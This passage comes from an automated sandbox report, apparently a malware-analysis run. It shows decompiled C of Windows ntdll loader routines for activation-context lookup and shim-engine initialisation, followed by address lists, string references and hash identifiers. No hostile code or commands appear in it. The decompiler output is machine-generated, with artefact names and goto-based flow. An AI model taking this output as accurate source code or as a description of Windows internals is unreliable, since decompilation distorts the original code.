                                                                                                                                                                                      								_t241 =  *(_t225 + 0x30);
                                                                                                                                                                                      								_v72 = _t241;
                                                                                                                                                                                      								L20:
                                                                                                                                                                                      								while(1) {
                                                                                                                                                                                      									if(_t255 <= 2) {
                                                                                                                                                                                      										_t163 = _t255;
                                                                                                                                                                                      										if(_t163 == 0) {
                                                                                                                                                                                      											_t164 =  *((intOrPtr*)(_t225 + 0x1a8));
                                                                                                                                                                                      											if(_t164 == 0) {
                                                                                                                                                                                      												L43:
                                                                                                                                                                                      												_t213 =  *((intOrPtr*)(_t241 + 0x1f8));
                                                                                                                                                                                      												_v92 = 0;
                                                                                                                                                                                      												if(_t213 == 0) {
                                                                                                                                                                                      													L28:
                                                                                                                                                                                      													_t213 =  *((intOrPtr*)(_t241 + 0x200));
                                                                                                                                                                                      													_v92 = 0xfffffffc;
                                                                                                                                                                                      													if(_t213 == 0) {
                                                                                                                                                                                      														goto L21;
                                                                                                                                                                                      													}
                                                                                                                                                                                      													_t255 = 3;
                                                                                                                                                                                      													_v44 = 3;
                                                                                                                                                                                      													L22:
                                                                                                                                                                                      													if(_t213 != 0) {
                                                                                                                                                                                      														_t241 = _v52;
                                                                                                                                                                                      														_t151 = E1D85A600(_t213, _v52, _v48,  &_v76,  &_v88);
                                                                                                                                                                                      														if(_t151 < 0) {
                                                                                                                                                                                      															if(_t151 != 0xc0150001 || _t255 == 3) {
                                                                                                                                                                                      																L32:
                                                                                                                                                                                      																if(_t151 < 0) {
                                                                                                                                                                                      																	if(_t151 != 0xc0150001) {
                                                                                                                                                                                      																		goto L24;
                                                                                                                                                                                      																	}
                                                                                                                                                                                      																	goto L23;
                                                                                                                                                                                      																}
                                                                                                                                                                                      																_t158 = _v88;
                                                                                                                                                                                      																if(_t158 >= 0x28) {
                                                                                                                                                                                      																	goto L12;
                                                                                                                                                                                      																}
                                                                                                                                                                                      																goto L34;
                                                                                                                                                                                      															} else {
                                                                                                                                                                                      																_t225 = _v68;
                                                                                                                                                                                      																_t241 = _v72;
                                                                                                                                                                                      																continue;
                                                                                                                                                                                      															}
                                                                                                                                                                                      														}
                                                                                                                                                                                      														_t241 = _v92;
                                                                                                                                                                                      														_v40 = (0 | _t241 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t241 == 0x00000000;
                                                                                                                                                                                      														asm("sbb edi, edi");
                                                                                                                                                                                      														_t247 =  ~(_t241 - 0xfffffffc) & _t241;
                                                                                                                                                                                      														_t151 = 0;
                                                                                                                                                                                      														goto L32;
                                                                                                                                                                                      													}
                                                                                                                                                                                      													L23:
                                                                                                                                                                                      													_t151 = 0xc0150008;
                                                                                                                                                                                      													goto L24;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												_t255 = 2;
                                                                                                                                                                                      												_v44 = 2;
                                                                                                                                                                                      												goto L22;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_t170 =  *_t164;
                                                                                                                                                                                      											if(_t170 == 0) {
                                                                                                                                                                                      												goto L43;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_t171 =  *((intOrPtr*)(_t170 + 4));
                                                                                                                                                                                      											_v92 = _t171;
                                                                                                                                                                                      											if(_t171 == 0) {
                                                                                                                                                                                      												L83:
                                                                                                                                                                                      												if(_t213 == 0) {
                                                                                                                                                                                      													goto L43;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												L84:
                                                                                                                                                                                      												_t255 = 1;
                                                                                                                                                                                      												_v44 = 1;
                                                                                                                                                                                      												goto L22;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											if(_t171 != 0xfffffffc) {
                                                                                                                                                                                      												if(_t171 != 0xfffffffd) {
                                                                                                                                                                                      													_t213 =  *((intOrPtr*)(_t171 + 0x10));
                                                                                                                                                                                      													goto L83;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												_t213 = "Actx ";
                                                                                                                                                                                      												goto L84;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_t213 =  *((intOrPtr*)(_t241 + 0x200));
                                                                                                                                                                                      											goto L83;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t172 = _t163 - 1;
                                                                                                                                                                                      										if(_t172 == 0) {
                                                                                                                                                                                      											goto L43;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										if(_t172 != 1) {
                                                                                                                                                                                      											goto L21;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										goto L28;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									L21:
                                                                                                                                                                                      									if(_t255 > 3) {
                                                                                                                                                                                      										_t151 = 0xc00000e5;
                                                                                                                                                                                      										goto L24;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									goto L22;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      							if( *((intOrPtr*)(_t254 + 8)) != 1) {
                                                                                                                                                                                      								_t160 = 0;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t227 =  *((intOrPtr*)(_t254 + 0x1c));
                                                                                                                                                                                      							if(_t227 != 0) {
                                                                                                                                                                                      								if(_t160 == 0) {
                                                                                                                                                                                      									goto L16;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_v92 = 0;
                                                                                                                                                                                      								_t233 =  *((intOrPtr*)(_t227 + _t254 + 4)) +  *_v84 %  *(_t227 + _t254) * 8;
                                                                                                                                                                                      								_t234 = _t233 + _t254;
                                                                                                                                                                                      								_t201 =  *((intOrPtr*)(_t233 + _t254 + 4)) + _t254;
                                                                                                                                                                                      								_v72 = _t234;
                                                                                                                                                                                      								if( *_t234 <= 0) {
                                                                                                                                                                                      									goto L19;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									goto L54;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								while(1) {
                                                                                                                                                                                      									L54:
                                                                                                                                                                                      									_t214 =  *_t201 + _t254;
                                                                                                                                                                                      									_v68 = _t201 + 4;
                                                                                                                                                                                      									if(E1D898050(_t214, _v84, 0x10) == 0x10) {
                                                                                                                                                                                      										goto L18;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t205 = _v92 + 1;
                                                                                                                                                                                      									_v92 = _t205;
                                                                                                                                                                                      									_t201 = _v68;
                                                                                                                                                                                      									if(_t205 <  *_v72) {
                                                                                                                                                                                      										continue;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									goto L19;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								L16:
                                                                                                                                                                                      								_t228 =  *((intOrPtr*)(_t254 + 0x18));
                                                                                                                                                                                      								if(( *(_t254 + 0x10) & 0x00000001) == 0) {
                                                                                                                                                                                      									_t174 = _t228 + _t254;
                                                                                                                                                                                      									_v92 = _t228 + _t254;
                                                                                                                                                                                      									while(E1D898050(_t174, _v84, 0x10) != 0x10) {
                                                                                                                                                                                      										_t174 = _v92 + 0x1c;
                                                                                                                                                                                      										_v92 = _v92 + 0x1c;
                                                                                                                                                                                      										_t211 = _t211 - 1;
                                                                                                                                                                                      										if(_t211 != 0) {
                                                                                                                                                                                      											continue;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										goto L19;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t214 = _v92;
                                                                                                                                                                                      									L18:
                                                                                                                                                                                      									if(_t214 != 0) {
                                                                                                                                                                                      										if( *((intOrPtr*)(_t214 + 0x10)) == 0) {
                                                                                                                                                                                      											goto L19;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t241 = _v80;
                                                                                                                                                                                      										if(_t241 != 0) {
                                                                                                                                                                                      											 *((intOrPtr*)(_t241 + 4)) =  *((intOrPtr*)(_t254 + 0xc));
                                                                                                                                                                                      											 *((intOrPtr*)(_t241 + 8)) =  *((intOrPtr*)(_t214 + 0x10)) + _t254;
                                                                                                                                                                                      											 *((intOrPtr*)(_t241 + 0xc)) =  *((intOrPtr*)(_t214 + 0x14));
                                                                                                                                                                                      											if(_t241 + 0x28 <=  *_t241 + _t241) {
                                                                                                                                                                                      												 *((intOrPtr*)(_t241 + 0x24)) =  *((intOrPtr*)(_t214 + 0x18));
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      										if((_t247 - 0x00000001 | 0x00000007) != 0xffffffff) {
                                                                                                                                                                                      											_t215 =  *((intOrPtr*)(_t247 + 0x14));
                                                                                                                                                                                      											if(_t215 != 0 && (( *(_t247 + 0x1c) & 0x00000008) == 0 || ( *(_t247 + 0x3c) & 0x00000008) == 0)) {
                                                                                                                                                                                      												_v93 = 0;
                                                                                                                                                                                      												 *0x1d9391e0(3, _t247,  *((intOrPtr*)(_t247 + 0x10)),  *((intOrPtr*)(_t247 + 0x18)), 0,  &_v93);
                                                                                                                                                                                      												 *_t215();
                                                                                                                                                                                      												 *(_t247 + 0x1c) =  *(_t247 + 0x1c) | 0x00000008;
                                                                                                                                                                                      												_t241 = _v104;
                                                                                                                                                                                      												if(_v117 != 0) {
                                                                                                                                                                                      													 *(_t247 + 0x3c) =  *(_t247 + 0x3c) | 0x00000008;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      										if(_t241 == 0 || E1D844428(_a4, _t241, _t247,  &_v60, _t254,  *((intOrPtr*)(_t254 + 0x20)),  *((intOrPtr*)(_t254 + 0x24)), _v88) >= 0) {
                                                                                                                                                                                      											_t151 = 0;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										goto L24;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									goto L19;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t242 = _v84;
                                                                                                                                                                                      								_v36 =  *_t242;
                                                                                                                                                                                      								_v32 =  *((intOrPtr*)(_t242 + 4));
                                                                                                                                                                                      								_v28 =  *((intOrPtr*)(_t242 + 8));
                                                                                                                                                                                      								_v24 =  *((intOrPtr*)(_t242 + 0xc));
                                                                                                                                                                                      								_t195 = E1D888170( &_v36, _t228 + _t254, _t211, 0x1c, E1D83B600);
                                                                                                                                                                                      								_t258 = _t258 + 0x14;
                                                                                                                                                                                      								_t214 = _t195;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L18;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						goto L91;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					goto L6;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				if(_t209 == 0) {
                                                                                                                                                                                      					goto L49;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				goto L5;
                                                                                                                                                                                      			}




























































                                                                                                                                                                                      0x1d85d698
                                                                                                                                                                                      0x1d85d6a2
                                                                                                                                                                                      0x1d85d6a6
                                                                                                                                                                                      0x1d85d6ad
                                                                                                                                                                                      0x1d85d6b1
                                                                                                                                                                                      0x1d85d6b4
                                                                                                                                                                                      0x1d85d6b8
                                                                                                                                                                                      0x1d85d6c3
                                                                                                                                                                                      0x1d85d6c7
                                                                                                                                                                                      0x1d85d6cb
                                                                                                                                                                                      0x1d85d90e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a913f
                                                                                                                                                                                      0x1d8a913f
                                                                                                                                                                                      0x1d85d847
                                                                                                                                                                                      0x1d85d84b
                                                                                                                                                                                      0x1d85d84c
                                                                                                                                                                                      0x1d85d84d
                                                                                                                                                                                      0x1d85d858
                                                                                                                                                                                      0x1d85d858
                                                                                                                                                                                      0x1d85d90e
                                                                                                                                                                                      0x1d85d6d1
                                                                                                                                                                                      0x1d85d6d1
                                                                                                                                                                                      0x1d85d6db
                                                                                                                                                                                      0x1d8a9164
                                                                                                                                                                                      0x1d8a9164
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a9164
                                                                                                                                                                                      0x1d85d6e1
                                                                                                                                                                                      0x1d85d6ea
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85d6f3
                                                                                                                                                                                      0x1d85d8fc
                                                                                                                                                                                      0x1d85d701
                                                                                                                                                                                      0x1d85d704
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85d70a
                                                                                                                                                                                      0x1d85d70d
                                                                                                                                                                                      0x1d85d922
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a9149
                                                                                                                                                                                      0x1d8a914e
                                                                                                                                                                                      0x1d8a9153
                                                                                                                                                                                      0x1d8a9158
                                                                                                                                                                                      0x1d8a9158
                                                                                                                                                                                      0x1d8a915a
                                                                                                                                                                                      0x1d8a915c
                                                                                                                                                                                      0x1d8a9161
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a9161
                                                                                                                                                                                      0x1d85d713
                                                                                                                                                                                      0x1d85d716
                                                                                                                                                                                      0x1d85d936
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a916e
                                                                                                                                                                                      0x1d8a9173
                                                                                                                                                                                      0x1d8a9178
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a9178
                                                                                                                                                                                      0x1d85d71c
                                                                                                                                                                                      0x1d85d71f
                                                                                                                                                                                      0x1d85d723
                                                                                                                                                                                      0x1d85d72f
                                                                                                                                                                                      0x1d85d73c
                                                                                                                                                                                      0x1d85d745
                                                                                                                                                                                      0x1d85d749
                                                                                                                                                                                      0x1d85d751
                                                                                                                                                                                      0x1d85d759
                                                                                                                                                                                      0x1d85d768
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85d76e
                                                                                                                                                                                      0x1d85d772
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85d778
                                                                                                                                                                                      0x1d85d77f
                                                                                                                                                                                      0x1d85d8f1
                                                                                                                                                                                      0x1d85d8f1
                                                                                                                                                                                      0x1d8a9370
                                                                                                                                                                                      0x1d8a9370
                                                                                                                                                                                      0x1d8a937b
                                                                                                                                                                                      0x1d8a9380
                                                                                                                                                                                      0x1d8a9383
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a9383
                                                                                                                                                                                      0x1d85d785
                                                                                                                                                                                      0x1d85d790
                                                                                                                                                                                      0x1d85d790
                                                                                                                                                                                      0x1d85d790
                                                                                                                                                                                      0x1d85d79a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85d7a0
                                                                                                                                                                                      0x1d85d7a3
                                                                                                                                                                                      0x1d85d7a7
                                                                                                                                                                                      0x1d85d80d
                                                                                                                                                                                      0x1d85d80d
                                                                                                                                                                                      0x1d85d816
                                                                                                                                                                                      0x1d85d81c
                                                                                                                                                                                      0x1d85d820
                                                                                                                                                                                      0x1d85d822
                                                                                                                                                                                      0x1d85d826
                                                                                                                                                                                      0x1d85d829
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85d830
                                                                                                                                                                                      0x1d85d833
                                                                                                                                                                                      0x1d85d85d
                                                                                                                                                                                      0x1d85d860
                                                                                                                                                                                      0x1d8a92e0
                                                                                                                                                                                      0x1d8a92e8
                                                                                                                                                                                      0x1d85d941
                                                                                                                                                                                      0x1d85d941
                                                                                                                                                                                      0x1d85d949
                                                                                                                                                                                      0x1d85d94f
                                                                                                                                                                                      0x1d85d874
                                                                                                                                                                                      0x1d85d874
                                                                                                                                                                                      0x1d85d87a
                                                                                                                                                                                      0x1d85d884
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85d886
                                                                                                                                                                                      0x1d85d88b
                                                                                                                                                                                      0x1d85d83e
                                                                                                                                                                                      0x1d85d840
                                                                                                                                                                                      0x1d85d891
                                                                                                                                                                                      0x1d85d8a5
                                                                                                                                                                                      0x1d85d8ac
                                                                                                                                                                                      0x1d8a933a
                                                                                                                                                                                      0x1d85d8dc
                                                                                                                                                                                      0x1d85d8de
                                                                                                                                                                                      0x1d8a935b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a9361
                                                                                                                                                                                      0x1d85d8e4
                                                                                                                                                                                      0x1d85d8eb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a9349
                                                                                                                                                                                      0x1d8a9349
                                                                                                                                                                                      0x1d8a934d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a934d
                                                                                                                                                                                      0x1d8a933a
                                                                                                                                                                                      0x1d85d8b2
                                                                                                                                                                                      0x1d85d8d2
                                                                                                                                                                                      0x1d85d8d6
                                                                                                                                                                                      0x1d85d8d8
                                                                                                                                                                                      0x1d85d8da
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85d8da
                                                                                                                                                                                      0x1d85d842
                                                                                                                                                                                      0x1d85d842
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85d842
                                                                                                                                                                                      0x1d85d955
                                                                                                                                                                                      0x1d85d95a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85d95a
                                                                                                                                                                                      0x1d8a92ee
                                                                                                                                                                                      0x1d8a92f2
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a92f8
                                                                                                                                                                                      0x1d8a92fb
                                                                                                                                                                                      0x1d8a9301
                                                                                                                                                                                      0x1d8a931f
                                                                                                                                                                                      0x1d8a9321
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a9327
                                                                                                                                                                                      0x1d8a9327
                                                                                                                                                                                      0x1d8a932c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a932c
                                                                                                                                                                                      0x1d8a9306
                                                                                                                                                                                      0x1d8a9313
                                                                                                                                                                                      0x1d8a931c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a931c
                                                                                                                                                                                      0x1d8a9315
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a9315
                                                                                                                                                                                      0x1d8a9308
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a9308
                                                                                                                                                                                      0x1d85d866
                                                                                                                                                                                      0x1d85d869
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85d872
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85d872
                                                                                                                                                                                      0x1d85d835
                                                                                                                                                                                      0x1d85d838
                                                                                                                                                                                      0x1d8a9366
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a9366
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85d838
                                                                                                                                                                                      0x1d85d830
                                                                                                                                                                                      0x1d85d7ad
                                                                                                                                                                                      0x1d8a917f
                                                                                                                                                                                      0x1d8a917f
                                                                                                                                                                                      0x1d85d7b3
                                                                                                                                                                                      0x1d85d7b8
                                                                                                                                                                                      0x1d8a9188
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a9194
                                                                                                                                                                                      0x1d8a91a5
                                                                                                                                                                                      0x1d8a91ac
                                                                                                                                                                                      0x1d8a91ae
                                                                                                                                                                                      0x1d8a91b0
                                                                                                                                                                                      0x1d8a91b7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a91bd
                                                                                                                                                                                      0x1d8a91bd
                                                                                                                                                                                      0x1d8a91c8
                                                                                                                                                                                      0x1d8a91ca
                                                                                                                                                                                      0x1d8a91d7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a91e5
                                                                                                                                                                                      0x1d8a91e6
                                                                                                                                                                                      0x1d8a91ec
                                                                                                                                                                                      0x1d8a91f0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a91f2
                                                                                                                                                                                      0x1d85d7be
                                                                                                                                                                                      0x1d85d7be
                                                                                                                                                                                      0x1d85d7c2
                                                                                                                                                                                      0x1d85d7c5
                                                                                                                                                                                      0x1d8a91f7
                                                                                                                                                                                      0x1d8a91fa
                                                                                                                                                                                      0x1d8a91fe
                                                                                                                                                                                      0x1d8a9213
                                                                                                                                                                                      0x1d8a9216
                                                                                                                                                                                      0x1d8a921a
                                                                                                                                                                                      0x1d8a921d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a921f
                                                                                                                                                                                      0x1d8a9224
                                                                                                                                                                                      0x1d85d805
                                                                                                                                                                                      0x1d85d807
                                                                                                                                                                                      0x1d8a9231
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a9237
                                                                                                                                                                                      0x1d8a923d
                                                                                                                                                                                      0x1d8a9244
                                                                                                                                                                                      0x1d8a924e
                                                                                                                                                                                      0x1d8a9254
                                                                                                                                                                                      0x1d8a925c
                                                                                                                                                                                      0x1d8a9261
                                                                                                                                                                                      0x1d8a9261
                                                                                                                                                                                      0x1d8a925c
                                                                                                                                                                                      0x1d8a926d
                                                                                                                                                                                      0x1d8a926f
                                                                                                                                                                                      0x1d8a9274
                                                                                                                                                                                      0x1d8a9286
                                                                                                                                                                                      0x1d8a9299
                                                                                                                                                                                      0x1d8a929f
                                                                                                                                                                                      0x1d8a92a1
                                                                                                                                                                                      0x1d8a92aa
                                                                                                                                                                                      0x1d8a92ae
                                                                                                                                                                                      0x1d8a92b0
                                                                                                                                                                                      0x1d8a92b0
                                                                                                                                                                                      0x1d8a92ae
                                                                                                                                                                                      0x1d8a9274
                                                                                                                                                                                      0x1d8a92b6
                                                                                                                                                                                      0x1d8a92d9
                                                                                                                                                                                      0x1d8a92d9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a92b6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85d807
                                                                                                                                                                                      0x1d85d7cb
                                                                                                                                                                                      0x1d85d7d9
                                                                                                                                                                                      0x1d85d7e0
                                                                                                                                                                                      0x1d85d7e7
                                                                                                                                                                                      0x1d85d7ee
                                                                                                                                                                                      0x1d85d7fb
                                                                                                                                                                                      0x1d85d800
                                                                                                                                                                                      0x1d85d803
                                                                                                                                                                                      0x1d85d803
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85d7b8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85d790
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85d902
                                                                                                                                                                                      0x1d85d6fb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • Actx , xrefs: 1D8A9315
                                                                                                                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D8A9178
                                                                                                                                                                                      • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1D8A9372
                                                                                                                                                                                      • GsHd, xrefs: 1D85D794
                                                                                                                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D8A9153
                                                                                                                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 1D8A914E, 1D8A9173
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                                                      • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                                                                      • API String ID: 3446177414-2196497285
                                                                                                                                                                                      • Opcode ID: ef1dfe764724a398332d6178a1bc68d1bc22d878cf46c34b46767b8ecbe1a772
                                                                                                                                                                                      • Instruction ID: 5069aabf67e8d77358684ee0f22f2188180e36f4462541ca39dd6d0685e8d74a
                                                                                                                                                                                      • Opcode Fuzzy Hash: ef1dfe764724a398332d6178a1bc68d1bc22d878cf46c34b46767b8ecbe1a772
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7AE1BF78608346CFD701CF19C880B6AB7E4BF88718F544A6DF9998B291D770E846CB93
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 46%
                                                                                                                                                                                      			E1D83640D(void* __ecx) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				void* _v12;
                                                                                                                                                                                      				void* _v536;
                                                                                                                                                                                      				void* _v548;
                                                                                                                                                                                      				char _v780;
                                                                                                                                                                                      				char* _v784;
                                                                                                                                                                                      				char _v788;
                                                                                                                                                                                      				char _v792;
                                                                                                                                                                                      				intOrPtr _v804;
                                                                                                                                                                                      				char _v868;
                                                                                                                                                                                      				char* _v872;
                                                                                                                                                                                      				short _v874;
                                                                                                                                                                                      				char _v876;
                                                                                                                                                                                      				void* _v880;
                                                                                                                                                                                      				char _v892;
                                                                                                                                                                                      				void* _v896;
                                                                                                                                                                                      				void* _v900;
                                                                                                                                                                                      				void* _v904;
                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                      				short _t48;
                                                                                                                                                                                      				short _t49;
                                                                                                                                                                                      				void* _t52;
                                                                                                                                                                                      				signed char _t61;
                                                                                                                                                                                      				void* _t67;
                                                                                                                                                                                      				intOrPtr _t71;
                                                                                                                                                                                      				void* _t81;
                                                                                                                                                                                      				signed char _t85;
                                                                                                                                                                                      				void* _t99;
                                                                                                                                                                                      				void* _t100;
                                                                                                                                                                                      				void* _t102;
                                                                                                                                                                                      				void* _t103;
                                                                                                                                                                                      				signed int _t104;
                                                                                                                                                                                      				signed int _t106;
                                                                                                                                                                                      				signed int _t108;
                                                                                                                                                                                      				void* _t109;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t108 = (_t106 & 0xfffffff8) - 0x374;
                                                                                                                                                                                      				_v8 =  *0x1d93b370 ^ _t108;
                                                                                                                                                                                      				_t48 = 0x16;
                                                                                                                                                                                      				_v876 = _t48;
                                                                                                                                                                                      				_t96 =  &_v876;
                                                                                                                                                                                      				_t49 = 0x18;
                                                                                                                                                                                      				_v874 = _t49;
                                                                                                                                                                                      				_t99 = __ecx;
                                                                                                                                                                                      				_v872 = L"apphelp.dll";
                                                                                                                                                                                      				_v784 =  &_v780;
                                                                                                                                                                                      				_v788 = 0x1000000;
                                                                                                                                                                                      				_v780 = 0;
                                                                                                                                                                                      				_t52 = E1D836C11( &_v788,  &_v876, _t109);
                                                                                                                                                                                      				if(_t52 < 0) {
                                                                                                                                                                                      					_t85 =  *0x1d9337c0; // 0x0
                                                                                                                                                                                      					__eflags = _t85 & 0x00000003;
                                                                                                                                                                                      					if((_t85 & 0x00000003) == 0) {
                                                                                                                                                                                      						L12:
                                                                                                                                                                                      						__eflags = _t85 & 0x00000010;
                                                                                                                                                                                      						L15:
                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                      							asm("int3");
                                                                                                                                                                                      						}
                                                                                                                                                                                      						L6:
                                                                                                                                                                                      						_t53 =  &_v780;
                                                                                                                                                                                      						if( &_v780 != _v784) {
                                                                                                                                                                                      							_t53 = E1D83BA80(_v784);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_pop(_t100);
                                                                                                                                                                                      						_pop(_t102);
                                                                                                                                                                                      						_pop(_t81);
                                                                                                                                                                                      						return E1D884B50(_t53, _t81, _v8 ^ _t108, _t96, _t100, _t102);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_push(_t52);
                                                                                                                                                                                      					_push("Building shim engine DLL system32 filename failed with status 0x%08lx\n");
                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                      					_push("LdrpInitShimEngine");
                                                                                                                                                                                      					_push(0xa35);
                                                                                                                                                                                      					L11:
                                                                                                                                                                                      					_push("minkernel\\ntdll\\ldrinit.c");
                                                                                                                                                                                      					E1D8BE692();
                                                                                                                                                                                      					_t85 =  *0x1d9337c0; // 0x0
                                                                                                                                                                                      					_t108 = _t108 + 0x18;
                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				E1D85E8A6(0, 0x4001,  &_v868);
                                                                                                                                                                                      				_t96 =  &_v872;
                                                                                                                                                                                      				_t103 = E1D836B45( &_v792,  &_v872, 0,  &_v892);
